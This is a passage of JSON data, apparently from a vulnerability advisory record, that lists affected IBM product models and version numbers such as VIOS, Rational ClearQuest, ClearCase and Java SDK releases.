"version": "7.0" }, { "model": "virtualization engine ts7700 r3.1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "virtualization engine ts7700 r3.0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "virtualization engine ts7700 r2.1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "virtualization engine ts7700", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.33.0.45" }, { "model": "virtualization engine ts7700", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.32.3.8" }, { "model": "virtualization engine ts7700", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.21.0.178" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "tivoli netcool configuration manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4.1" }, { "model": "tivoli netcool configuration manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "tivoli netcool configuration manager if001", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4.1.3" }, { "model": "tivoli netcool configuration manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4.1.3" }, { "model": "tivoli netcool configuration manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4.1.2" }, { "model": "tivoli netcool configuration manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4" }, { "model": "tivoli netcool configuration manager if", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.0.6003" }, { "model": "tivoli netcool configuration manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.0.6" }, { "model": "tivoli directory server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "tivoli directory server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "tivoli directory server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "tivoli access manager for e-business", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.1" }, { "model": "tivoli access manager for e-business", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "tivoli access manager for e-business", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5.1" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "security directory server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4" }, { "model": "security directory server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.1" }, { "model": "security directory server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "security directory server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "security directory server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "security directory server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.3" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.2" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.6" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.5" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.4" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.3" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.1" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.01" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.13" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.12" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.11" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.7" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.6" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.4" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.13" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.010" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.213" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.211" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.18" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.9" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.8" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.7" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.6" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.5" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.4" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.10" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.9" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.8" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.7" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.17" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.16" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.15" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.14" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.13" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.12" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.11" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.06" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.9" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.8" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.7" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.6" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.5" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.4" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.3" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.19" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.18" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.16" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.15" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.14" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.12" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.10" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.9" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.7" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.6" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.5" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.4" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.3" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.1" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.13" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.07" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.03" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.02" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.010" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.01" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.28" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.27" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.26" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.25" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.24" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.23" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.213" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.212" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.211" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.210" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.21" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.19" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.18" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.17" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.16" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.13" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.12" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.11" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.12" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.9" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.8" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.7" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.6" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.5" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.4" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.10" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.9" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.8" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.6" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.17" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.16" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.15" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.14" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.13" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.12" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.11" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.07" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.03" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.9" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.2" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.18" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.17" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.16" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.15" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.14" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.5" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.4" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.1" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.0.0" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3.0.0" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.0.0" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.0.0" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.9.0.0" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.0" }, { "model": "operational decision manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.7" }, { "model": "operational decision manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "operational decision manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "operational decision manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "operational decision manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "operational decision manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "multi-enterprise integration gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.0.1" }, { "model": "multi-enterprise integration gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "java sdk", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "java sdk sr1-fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8" }, { "model": "java sdk sr1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8" }, { "model": "java sdk sr fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8110" }, { "model": "java sdk sr fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "811" }, { "model": "java sdk 7r1 sr3-fp1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "java sdk 7r1 sr3", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "java sdk 7r1 sr2-fp10", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "java sdk 7r1 sr2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "java sdk 7r1 sr1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "java sdk 7r1 sr fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "310" }, { "model": "java sdk 7r1 sr fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31" }, { "model": "java sdk sr8-fp10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "java sdk", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "java sdk sr9-fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "java sdk sr9", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "java sdk sr8-fp10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "java sdk sr8", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "java sdk sr7", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "java sdk sr5", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "java sdk sr4-fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "java sdk sr4-fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "java sdk sr4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "java sdk sr3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "java sdk sr2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "java sdk sr1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "java sdk sr fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7910" }, { "model": "java sdk sr fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "791" }, { "model": "java sdk r1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "java sdk 6r1 sr8-fp5", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "java sdk 6r1 sr8-fp4", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "java sdk 6r1 sr8-fp3", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "java sdk 6r1 sr8-fp2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "java sdk 6r1 sr8", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "java sdk 6r1 sr fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "87" }, { "model": "java sdk 6r1 sr fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "85" }, { "model": "java sdk sr16-fp3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "java sdk sr16-fp5", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "java sdk sr16-fp4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "java sdk sr16-fp3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "java sdk sr16-fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "java sdk sr16", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "java sdk sr14", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "java sdk sr13-fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "java sdk sr13-fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "java sdk sr13", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "java sdk sr12", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "java sdk sr11", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "java sdk sr10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "java sdk sr fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6167" }, { "model": "java sdk sr fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6165" }, { "model": "java sdk sr fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "61625" }, { "model": "java sdk sr fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "61622" }, { "model": "java sdk sr fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "61615" }, { "model": "java sdk", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "java sdk sr16-fp9", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "java sdk sr16-fp8", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "java sdk sr16-fp6", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "java sdk sr16-fp3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "java sdk sr16-fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "java sdk sr16-fp11", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "java sdk sr16-fp10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "java sdk sr16-fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "java sdk sr16", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "java sdk sr15", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "java sdk sr fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.01613" }, { "model": "java sdk sr fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.01611" }, { "model": "java sdk", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "java sdk sr15", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5" }, { "model": "java sdk sr14", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5" }, { "model": "integration toolkit", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9" }, { "model": "integration bus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, 